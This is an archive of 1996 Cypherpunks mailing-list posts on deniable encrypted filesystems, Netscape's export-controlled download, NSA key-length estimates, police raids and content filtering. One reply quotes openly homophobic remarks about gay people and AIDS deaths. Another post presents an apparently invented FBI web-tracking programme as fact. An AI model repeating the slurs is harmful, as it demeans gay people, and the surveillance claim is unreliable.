From: Llywarch Hen <ecgwulf@worldnet.att.net>
Date: Fri, 19 Jul 1996 17:42:06 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: New Infowarfare Panel
Message-ID: <2.2.16.19960719061357.230f34a8@postoffice.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain



>I'm certainly not saying "information warfare" is impossible--for example,
>I did some work in the late 70s for DARPA on knocking out satellites with
>particle beam weapons. Specifically ...

There is an interesting document at
http://www.rand.org/publications/electronic/.
_Strategic Information Warfare: A New Face of War_, by Roger C. Molander,
Andrew S. Riddile, and Peter A. Wilson.


-- Llywarch Hen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 19 Jul 1996 15:09:14 +0800
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.SUN.3.91.960718201611.24193A-100000@crl2.crl.com>
Message-ID: <199607190415.XAA26616@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Sandy Sandfort wrote:
> And yet I live.  I'll trust a gunnie over a jackbooted ninja
> any time and any place.
> 

I can agree with that (and most of your other points). I simply pointed
out that protection of the access to one's house is necessary to ensure
that firearms under the pillow can be used effectively and more safely.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 19 Jul 1996 10:41:49 +0800
To: deviant@pooh-corner.com
Subject: Re: Opiated file systems
In-Reply-To: <Pine.LNX.3.94.960718015546.9976B-100000@switch.sp.org>
Message-ID: <199607182215.XAA00331@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



<deviant@pooh-corner.com> writes:
> On Wed, 17 Jul 1996, Adam Back wrote:
> > A problem yes.  My thoughts were that you would effectively have two
> > filesystems and use them both yourself for real work.  That is to say
> > that you would say have some consulting work doing some programming or
> > something, and use the 1st encrypted filesystem for this work.  If
> > this work was covered by an NDA, so much the better, as it would
> > provide an understandable reason for encrypting.
> 
> Good Idea, but I also like the idea of selective-duress, i.e. not
> necisarily having a duress key at all.

That was my meaning: either 1 or 2 filesystems, at the users option,
and for the file system to look the same to anyone not holding the 2nd
key (if there is one) whether or not there is a 2nd hidden file system.

> There's also an Idea me and Mouse had, which is to have a fault-tolerant
> duress system.  Its something like this...  You have a Duressfs and a
> Non-Duressfs.  If they enter the duress key is entered wrong, but only by
> a certain percentage of characters (i.e. sex instead of hex), it lets you
> see the Duressfs.  If you do this too many consecutive times, it runs the
> DuressNuke function (optional?).

More subtle than straight nuke the data, but still they'll have the
backup, and the code to reverse-engineer.

Another idea might be to have secret shared keys to your encrypted fs,
so you can't access your file system without your friend(s)
co-operation.  That would give your friends an opportunity to nuke
their share of the key before they got their dawn raid.  You could
automate the nuking, with some pre-arranged policy for key destruction
(eg the computers could bounce messages off each other, and if this
stops the key-portion gets nuked).

However, the opposition is already one step ahead: simultaneous dawn
raids were the fad during operation Sun-Devil, just in case of such
schemes I presume.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 19 Jul 1996 10:25:32 +0800
To: frantz@netcom.com
Subject: Re: Opiated file systems
In-Reply-To: <199607180630.XAA29062@netcom8.netcom.com>
Message-ID: <199607182219.XAA00332@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz <frantz@netcom.com> writes:
> At  1:30 PM 7/16/96 -0700, Jim Gillogly wrote:
> >"Deranged Mutant" <WlkngOwl@unix.asb.com> writes:
> >>A problem with a c'punk-style encrypted fs with source code and wide 
> >>distribution is, of course, that attackers will KNOW that there is a 
> >>duress key.
> >
> >Good point.  This suggests a design desideratum for any such system should
> >be that the user may choose not to have a duress key, maintaining
> >semi-plausible deniability for those who choose to have one.
> 
> Perhaps a user settable number of duress keys with different behavior for
> each of them?

I'm not sure what you had in mind for differing behaviours (were you
thinking nuking of data variety?), but I think the option for multiple
hidden file systems may be a feature some people would want.

However, I think it would greatly reduce an individuals plausible
deniability of there existing a 2nd hidden file system, if they admit
to a 1st hidden file system.  They have admitted that they are willing
to play the duress key game, so what's to say they haven't done it
again.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 19 Jul 1996 17:08:30 +0800
To: cypherpunks@toad.com
Subject: Re: MSNBC and cookies
Message-ID: <ae14788d060210042e43@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:25 AM 7/19/96, Joel McNamara wrote:
>In attempting to check out different Net media coverage of TWA 800, it
>appears the msnbc.com site won't let you in without a cookie.  Repeated
>cookie cancels with Navigator 3.0 drop you into an indigestive loop of the
>server continuing to try to force feed you cookies.  When you finally click
>OK, you get in.
>
>Am I spacing, or is this the first site anyone's stumbled on that requires a
>cookie for access?  I've never been shut out of a site for canceling a
>cookie.  The first cookie request does have a user ID field.  If the server
>(or client) isn't misbehaving, this seems like a wee bit of a privacy issue.
>
>I tried accessing the page (http://www.msnbc.com) on 7/18/96 around 9:15 PM
>PDT.  Anyone care to confirm this.

Microsoft and GE, the parent corporation of NBC, are participants in the
FBI's "Web Awareness Program." Like the FBI's "Library Awareness Program,"
which tracked which books were being checked out by which patrons, the Web
Awareness Program tracks user interests at Web sites.

The WAP has already allowed the FBI and other intelligence agencies to
check up on several people who appeared to have an unusual interest in the
TWA 800 case.

(Don't spend too much time in certain sites, friends.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Fri, 19 Jul 1996 17:07:11 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.32.19960719063324.00695be4@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>Nope, not true.  Say what you will about California, but the one
>thing it did right was pass a law that said anyone found in your
>house at night is presumptively a threat to which you may respond
>with deadly force.  Shoot on sight, in other words.

I find it hard to believe "anyone".  If "anyone" happens to be
law enforcement, as has been proven again and again: yer screwed
no matter what (either dead or in jail forever).  //cerridwyn//







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 19 Jul 1996 16:27:17 +0800
To: Clay.Olbon@dynetics.com>
Subject: Re: TLA abuse (?) [non-crypto, mostly]
In-Reply-To: <AE13A02A-A0EDC0@193.239.225.200>
Message-ID: <Ylvk_Xa00YUp1QqcY0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 18-Jul-96 Re: TLA abuse (?)
[non-cryp.. by "Clay Olbon II"@dynetics 
> Child pornography is illegal, however I don't believe that pictures of
> nekkid children are always considered to be child pornography (however much
> small-minded twirps want you to believe that they are).  I know several
> "fundamentalists" who decry what our society has sunk to with images such

The Knox case established that lascivious exhibition of the genitals
(required for conviction) could take place when the kid was clothed. In
that case, the girls were dancing around wearing leotards.

I have my cites at work.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Fri, 19 Jul 1996 18:47:37 +0800
To: Matt Blaze <mab@research.att.com>
Subject: Privatize the NSA (Was: NSA response to key length report)
In-Reply-To: <199607181604.MAA12956@nsa.research.att.com>
Message-ID: <199607190716.AAA20359@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



It sounds like most of their "counter-arguments" are just stalling tactics.

If you are a lawyer for someone you know is guilty, you still would choose
to find every reason in the book to attack the prosecution's case.  Here we
have precisely the same effect with the NSA.  Any tactical manuveur to keep
stalling the impending collapse of ITAR.

(It is human .. er .. rather .. bureaucrat-esque to claim innocence in the
face of overwhelming evidence of guilt.)

> The NSA document also calls into question our cost estimates for ASIC
> components, suggesting that ASIC chips of this type cost NSA
> approximately $1000.00 each.  However, our $10.00 per chip estimate is
> based on an actual price quote from a commercial chip fabrication
> vendor for a moderate-size order for an exhaustive search ASIC
> designed in 1993 by Michael Wiener [2].  Perhaps NSA could reduce its
> own costs by changing vendors.

Perhaps, in their fit of downsizing, Congress should privatize the NSA?

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 19 Jul 1996 18:08:08 +0800
To: tcmay@got.net>
Subject: Re: "address verification databases"? (was: Netscape download...)
Message-ID: <199607190719.AAA14861@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Personally, I don't mind being in a data base of people interested in
products with strong crypto.  (For another one, ask majordomo@toad.com.) 
BTW, I must be lucky, I down loaded it on the first try.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 19 Jul 1996 19:29:47 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <ae143914000210044473@[205.199.118.202]>
Message-ID: <199607190748.AAA08518@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > Filtering is not "wrong," Cerridwyn, it is a rational
 > response to garbage being spewed constantly. I filter lots
 > of items. I read "Scientific American" and "The Economist"
 > because they filter (or "censor," in the sense some are
 > objecting to here) nonsense about "queer rights" and
 > "peircing fashions," to name but a few things I have no
 > interest in hearing about.

Filtering is wonderful.  Long live filtering.

I used to read "Scientific American" too, back in the days when
the table of contents wasn't illustrated with cute little icons.
Back then, reputable scientists, as opposed to staff writers and
less reputable scientists, actually wrote all the articles, which
were about science, and not political screeds mascarading as
science.

And to conserve bandwidth, please reread the above paragraph
substituting "Nova" for "Scientific American" and "watch" for
"read."

Having offended "Scientific American" and PBS, let us now proceed
to the main agenda item, offending homosexuals.

 > If I had kids, I'd make sure that lots of negative memes
 > were kept away from them until they reached an age where it
 > no longer mattered, where there views are already basically
 > set.

If I had kids, I would be overjoyed that the new technology of
the information age permitted them to investigate any topic of
their choice in the safety of their own home.  Of course, there
would be some reasonable limits during their very early years, if
only to prevent them from waking up screaming in the middle of
the night, but I expect most of these could be eliminated by the
time they reached their early teens.

If I had kids, I am sure Tim would support my right to give them
access to the entire universe of human knowlege and thought as
early as possible, and to let them form their own opinions on
every conceivable subject, even if those opinions differed from
my own.  Where I suspect we differ, is that I would not only
advocate such an advantage for my kids, but for his as well.

The problem with giving parents the absolute right to control
their childrens' input of memes until the children are too old
and stupid to learn anything new, is that it creates generational
propagation of obsolete ideologies.  All the Dole children think
exactly like Bob.  All the Hitler children think exactly like
Adolf.  Same for the Mengele children, the Nixon children, the
Stalin children, the Netanyahu children, etc...

 > I see nothing wrong in this. Anyone who disagrees is, of
 > course, free to set his filters differently, but not to
 > insist that my filters be changed. And the government is not
 > free to pass any laws about what filter sites can and can't
 > do.

Before the days of home computers and filters, we had things
called public libraries.  They provided all citizens with
unfiltered access to information of their choice, even children.
Members of the American Library Association are pretty good at
torching paper trails of what people choose to read, and allowing
children who have reached the age of reason access to almost
everything in the library, as long as they don't talk too loudly
or stick gum to the seats.  Parents may not like this, but up
until now, the librarians have stood their ground.

The movement towards accessing information from home PCs, coupled
with the new "parents rights" movement and filtering software,
creates a situation where no one under the age of 18 can have
access to any information their parents don't want them to see.

As the Web replaces the library, young people won't even be able
to preserve the same anonymous access to controversial
information they have always had in the past.  This is a step
backwards for youth rights.

 > Unfortunately, I think many on this list are so taken by
 > "liberalistic" notions that they think the State needs to
 > intervene to stop me from filtering my son's access to "The
 > Joys of Queer Sex."

 > (As a libertarian, I really don't care what sexual
 > practices others practice, so long as I am not forced to
 > either fund or witness their practices. And so long as I am
 > free to filter out their practices as I see fit, including
 > for my minor children and/or members of my household.)

The age of filtering has arrived.  You can filter your childrens'
access to sex manuals, grandma's access to the elder abuse web
page, and your underpaid Ethiopian leaf blower operator's access
to anything having to do with laws against sub-minimum wages or
slavery.

 > Some parents simply get tired of spending time each night
 > trying to undo the propaganda taught in many public school,
 > such as books like "I Have Two Mommies." Many of these
 > parents eventually give up and put their kids in religious
 > or private schools (even though they continue to pay taxes
 > for schools their own children are no longer using).

I certainly believe that the education dollar should be in the
hands of the education consumer, that the NEA and the AFT should
be splintered into a million pieces and scattered to the winds,
and that providing educational services should become a
competitive business run with the efficiency of Federal Express.

Nonetheless, I am not going to panic when the kids come home
after having read "Uncle Bruce's Asshole Has Two Uses" or
"Grandma Visits the Euthanasia Clinic" in class.  The solution to
bad speech is more speech.  Older kids can make up their own
minds about such things after hearing all sides, including their
parents', and younger kids generally take what is said at home at
face value anyway.

 > Queers are, as far as I'm concerned, perfectly free to
 > practice their AIDS-spreading practices to any and all
 > receptive anuses they can find, but I eschew this lifestyle
 > and will fight to the death for this right to avoid their
 > practices from being forced on me or my children (if I had
 > any, which I don't).

As an individual who has no desire to engage in gay sex, or watch
it being performed while I am eating, I must admit my attitudes
towards the "gay community" have undergone a certain evolution in
recent years.  Back in the '70s, gays supported a wide-ranging
platform of human rights issues, and a lot of activists whose
work I admired on many issues I supported "happened to be gay."

Now that the gay community has narrowed its focus solely to the
issue of consensual adult sodomy rights, and shown alarming signs
of sucking up to the Radical Religious Right, I really don't have
warm feelings towards it anymore.  They have marginalized many of
their former supporters and seem more interested in pleasing
Jesse Helms than in showing anything resembling ideological
integrity.  I really believe the gay movement of today would sell
out almost anyone if they thought it would guarantee the right of
homosexual men to join the Republican Party and plug each others
assholes in private in the community of their choice.

A right I support, of course, as long as I don't have to watch it
or pay for it.

 > I think of AIDS as "evolution in action." Retroviruses
 > which have existed for millenia now find new vectors for
 > spreading in our population. I cry no tears for those dying
 > of AIDS, and work to reduce to tax dollars spent on such
 > things as "AIDS research." Let those who introduced the new
 > vector pay for the research.

I'm not sure this is "evolution in action", as much as the "law
of unintended consequences." Kind of like feeding ground up sheep
to cows and discovering that the brains of hamburger eaters are
turning to swiss cheese.  Not a morality issue at all.

Homosexual transmission of HIV is not the significant vector in
most of the world anyway, with the exception of the US and a few
other countries where the virus happened by pure accident to find
its way into a high risk population.

 > What do you call ten million AIDS deaths?  You figure it
 > out.

If this is like the lawyer joke, it isn't very nice.

In any case, to summarize...

   1.  Let a thousand filters bloom today.
   2.  Filtering what you read is good.
   3.  Filtering what other people read is bad.
   4.  Choosing your own perversions is good.
   5.  Making other people watch is bad.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 18:50:00 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: US versions of Netscape now available
In-Reply-To: <v03007600ae13ace3cf64@[192.187.162.15]>
Message-ID: <v03007600ae14f02cc031@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:11 PM -0700 7/18/96, Adam Back wrote:

>Presumably as this latest netscape beta is freely distributable, once
>it's out it will be on ftp.unimi.dsi.it, ftp.ox.ac.uk, etc, etc.

Not at all. That would be software piracy--and they'd stand the same chance
of going to jail they would if they had Lotus Notes or Microsoft Word on
such sites, crypto or no.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 19 Jul 1996 15:26:22 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <v03007603ae14644ce4b1@[192.187.162.15]>
Message-ID: <Pine.SV4.3.91.960719010007.5501B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


DAvid Sternlight,

There are not only public benefits when the government gets bigger and 
bigger and bigger.

Even though you can't put a dollar value on loss of freedom, it is a loss.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan <alano@teleport.com>
Date: Fri, 19 Jul 1996 19:23:00 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: "address verification databases"? (was: Netscape download...)
In-Reply-To: <199607190719.AAA14861@netcom8.netcom.com>
Message-ID: <199607190810.BAA07064@linda.teleport.com>
MIME-Version: 1.0
Content-Type: text


> 
> Personally, I don't mind being in a data base of people interested in
> products with strong crypto.  (For another one, ask majordomo@toad.com.) 
> BTW, I must be lucky, I down loaded it on the first try.

I could not get it to download.  I then ignored the program and went to do
something else.  After about 3-4 minutes, it finally connected.  It seems
to work, it just takes a bloody long time.

As for being on lists...  I tend to assume I am on alot of lists.  I
expect to be one of the people up against the wall when the police state
comes...  (But they will have to make an appointment first.  I am busy.)

[For those who will nitpick about the lack of usual sig lines...  I am
Telnetted in and not using my usual mailer.  Waiting for a download to
finish.]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Fri, 19 Jul 1996 16:06:12 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <4skrnb$8bp@life.ai.mit.edu>
Message-ID: <31EF19A5.15FB@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> I wonder when and how raids in the U.S. moved from the "Come out with your
> hands up" verbal announcement (for the cases that needed more than a knock
> on the door) to this blast-in-the-doors approach, where the raiders are
> dressed in "tactical black" and are wearing black Nomex hoods and carrying
> MP-5s and blast any "perp" who looks at them cross-eyed?
 
If people decide that they are going to permit widespread ownership of guns
then these tactics are inevitable. They are rare in the UK because gun
ownership is relatively rare.

I find this type of talk typical wishy washy libertarian twaddle. There are
dangerous people arround besides the government and the government is the
only agency that is going to protect society from them. If you don't like 
living in a country where the police are armed to the teeth then move to
the UK where there are very few armed police. Of course you will find that
the price of freedom of mind is a minor restriction on your personal freedom,
you won't be allowed a weapon either but that is the tradeoff. 

If you want to own guns then you should accept the fact that you risk having
your head blown off in the middle of the night by a SWAT team. Just as the
car has introduced the risk of being killed in a trafic accident the gun has
introduced new risks. If society dosen't like the risks then it can opt
to ban the technology. 

If you want to own a gun because you have some kind of personality problem
and you need to prop up your ego then 


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 19 Jul 1996 19:23:30 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "address verification databases"?
Message-ID: <2.2.16.19960719081433.364784b4@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 PM 7/17/96 -0700, Tim May wrote:
>At 9:45 PM 7/17/96, Jeff Weinstein wrote:
>
>>  Because we have not yet been able to obtain the address verification
>>databases that we need for Canada.  There is someone working on
>>tracking this down right now.  When we get the proper database we
>>will add access to canada.
>>
>>        --Jeff
>
>Jeff, can you tell us anything more about what these "address verification
>databases" are?
>
>For example, are they derived from government sources? Census data? (Naw,
>can't be, for at least two obvious reasons). Voting records? (Naw.) Credit
>card purchases? (??)

I followed the links and explored the web site of the "address verification"
provider ( http://www.abii.com ). The data they have about me is outdated
(by at least a year) and apparently derived from a phone book or directory
assistance. 

I picked up a copy of "The Net" magazine at the store tonight because it's
got an article listing several of these Web-accessible address/phone
databases. The article doesn't say anything especially fascinating but it
does list three such sites:

http://www.abii.com/lookupusa/adp/peopsrch.htm
http://www.searchamerica.com/
http://www.switchboard.com/

--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Fri, 19 Jul 1996 19:33:26 +0800
Subject: Re: Alternative Journalism
In-Reply-To: <ae1445400202100420d1@[205.199.118.202]>
Message-ID: <9607190123.aa15828@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


At 11:04 PM 7/18/96, enquirer@alpha.c2.org wrote:
>                   THE CYPHERPUNK ENQUIRER PRESENTS:
>
> ...
>"May's crazy as a loon.  You'll like him.  Gilmore, he's just still pissed
>at Shimamura for that stunt in the hot tub ... "

A certain New York Times columnist questions Markoff's ethics, and I believe
John that the toad.com logs showed no intrusion by Mitnick.  I managed to
peg a precise time on Kevin's multi-system intrusion on my home Sparc 20,
which helped peg him in NC off the 1(800) ANI he was gaining access through.
One of Mitnick's friends had the audacity to contact Stanton at EFF about
the possibility of defending him.  He was told there were no classical
civil liberties to argue in the case...  So I suppose it's best to let
sleeping dogs lie, eh?   
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 23:53:40 +0800
To: Jeff Barber <jeffb@issl.atl.hp.com>
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <v03007603ae14644ce4b1@[192.187.162.15]>
Message-ID: <v03007601ae14f5fa1d3d@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:04 PM -0700 7/18/96, Jeff Barber wrote:

>
>> Now THAT is apples and oranges. The security of, say, IBM's, or the FAA's,
>> or AT&T's domestic computer networks has little to do with crypto export
>> policy.
>
>Big companies like IBM, AT&T, etc. have *international* networks.  Hence,
>the connection to the crypto export policy, which prevents comprehensive
>security programs from being deployed.  As a "senior techinical executive"
>(oxymoron alert) to Fortune 50 companies, I assume you know that and are
>simply choosing to ignore it for the sake of your current argument.

There are exceptions to ITAR for this purpose (overseas offices of US
companies). In addition, like the argument that we shouldn't jail anyone
until all social evils are cured, your argument fails. IBM can secure their
domestic network (at least) without having to secure their global network.
As for your suggestion that I am special pleading, that's just unsupported
defamation. I suppressed nothing--it is you who are omitting the facts I
mention just above. Only a fool would accuse another of special pleading
when the possibility the accuser doesn't understand the argument, or have
all the data exists. If you have any integrity you'll apologize.

>
>
>> >Putting the government in charge of fixing security problems is likely
>> >to result in an infrastructure optimized for surveillance, as we've seen
>> >with other government-sponsored initiatives (Clipper, DigitalTelephony,
>> >etc.).
>>
>> The subject matter of the Commission's inquiry has more to do with
>> authentication than message encryption, and more to do with infrastructure
>> and network security. And as it happens there is no problem getting export
>> licenses for authentication-only software with as secure a key as you like
>> and no escrow. RIPEM/SIG did it years ago. You aren't even on the same page
>> as this issue.
>
>There is more to security than authentication, as I'm sure you also know
>but are choosing to ignore.

Another attempt to accuse, read minds, and impute motives. We're talking
about securing networks such as communications, transportation, and power,
against hacker attacks. Authentication is the core, not encryption. A main
problem is the spoofer instructing the network to self-destruct. Long-key
authentication can address this when coupled with the safeguarding of keys.
and some system precautions not related to encryption.

> Authentication alone may suffice in some
>situations but clearly not all.

So what? What part of "more to do with....than" don't you understand? I
never said "all"--that's a straw man to try to shift the ground of the
discussion rather than attempting a direct refutation.


>
>> Again, you are trying to fight a different battle in the wrong arena.
>> This isn't about your ability to encrypt your traffic. It's about securing
>> the domestic infrastructure against information warfare. I know this is
>> beginning to sound tiresome, but you'd better do your homework.
>
>Indeed.

So do it.

>  This isn't a different battle, though; it's all interwoven.

So what? Everything is connected to everything else.


>I don't want the government responsible for "securing the domestic
>infrastructure..." for the same reason that I don't want them telling
>me where or to whom I can sell crypto.

Fair comment--you're certainly entitled to your opinion.

>  They haven't any right to, IMO,

Read the Constitution.

>and besides, I don't trust them to look out for my interests.

At least some of one's interests we might both agree. There's the old joke
"I'm from Washington and I'm here to help you."

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 20 Jul 1996 20:45:51 +0800
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <doug-9606181433.AA022512492@netman.eng.auburn.edu>
Message-ID: <Pine.LNX.3.93.960719014124.1133F-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Jul 1996, Doug Hughes wrote:

> If people break into my house with the element of surprise wearing
> all black in the middle of the night, they have the element of surprise
> FIRMLY on their side.. I'd have to believe that reaching for a gun
> was the most stupid thing I could do in the entire world in this sort
> of circumstance. 
> "You'd be right, but you'd be dead" - Dr. SNMP
>  If you don't reach for a gun, at least you have the 'chance' for
> restitution on your side. If you're dead, you have no options.

     If you are trained a certain way, you _are_ going to reach for 
a weapon, and hell, at least then my kid will have enough money to go to
whatever college she wants. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Fri, 19 Jul 1996 20:23:51 +0800
To: paquin@netscape.com
Subject: Re: Netscape download requirements
Message-ID: <2.2.32.19960719084701.006a8aac@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



I realize you're probably overloaded with email/etc, but as you
don't read c'punks, I'll take a chance with a personal note 
anyway... 

>> Well one 'ITAR gangsta' can alwas upload the linux version to a
>> 'liberated ftp site'.
>Great.  Convince the government to withdraw our permission
>and never to give it again while the current laws stand.  
>Please don't do this.

Allow the government to think that we think it has the right to give 
us their permission and we've lost everything.  The government should
need OUR permission, not the other way 'round.  To give the government
the impression that we will bow to it's power on these matters may be
financially beneficial for a corporation, but is unacceptable and 
humiliating for free individuals.

>I'd bet on the first.  Why screw with this?  We worked hard
>to make this possible and you want to ruin it.  Sheesh.

Because freedom doesn't come in degrees, it's all or nothing.

>"I hate the government so I'll blow up a federal building
>and then the FBI will get more money and attention and
>power and, um, that'll show 'em, er, ah....."

Exporting crypto-systems and killing people is comparing apples
and hand grenades.  Please come up with a relevant analogy.

>For those of you who think some of our info requests go too far: well,
>my position to the US was: I want to do a download.  I'll do what it
>takes.  Given all the ITAR vagueness and total lack of case law, I 
>think both sides did very well.  While I don't agree with the 

While I am one of those who believe your info requests do go too far,
I also appreciate the fact that you wouldn't be able to "do a download"
without it.  I thank you for your efforts on these fronts, and have 
two things to say regarding:

1)  Please don't chastise individuals who take direct action and use
civil disobediance as a measure to change bad laws and policies (ie by
making your companies software available internationally).  When
done on a mass scale, the long-term benefits FAR outweigh the short
term consequences.  While you as a corporation find it much more 
difficult to take such actions, as they would most likely ruin your
corporation, individuals acting in this capacity cannot be ruined quite
so readily.

2)  Please don't misuse the information you gain by logging all your
network traffic.  I like using Navigator, and would hate to have to 
give up using it due to some breach of trust by Netscape regarding 
someone's personal info. 
 
>wrong place to wage battle.  Rather than attack some odd piece 
>of enforcement, participate in the debate over the regulations
>themselves.  Strides are being made.  This is a good time for 
>your voice to be heard. If you don't like this mechanism, don't 
>use it.  It's your choice.

I agree mostly.  I would rephrase, however, to say: In addition to
attacking odd pieces of enforcement, participate in the debate over
the regulations themselves.  Besides, contrary to your gist, this 
is probably one of the most prominent pieces of enforcement, and 
therefore a very logical candidate for attack.

//cerridwyn//














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Fri, 19 Jul 1996 20:20:26 +0800
To: cypherpunks@toad.com
Subject: Re: Netscrape download
In-Reply-To: <199607190151.VAA14421@nrk.com>
Message-ID: <4snish$div@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <m291cgu9oh.fsf@deanna.miranova.com>,
Steven L Baur  <steve@miranova.com> wrote:
> Linux executable:
> $ md5sum =netscape-3.0b5
> a82666e8c83a39c4e4653f0de2a930cf  /usr/local/www/bin/netscape-3.0b5

Looks like we match:

~ $ md5sum /opt/netscape-3.0b5a-US/bin/netscape
a82666e8c83a39c4e4653f0de2a930cf  /opt/netscape-3.0b5a-US/bin/netscape

Also, for any others who might like to compare their Linux .tar file:

~ $ md5sum netscape.tar.Z
fdface7dbbf0ea350847edf1ad37e4a8  netscape.tar.Z

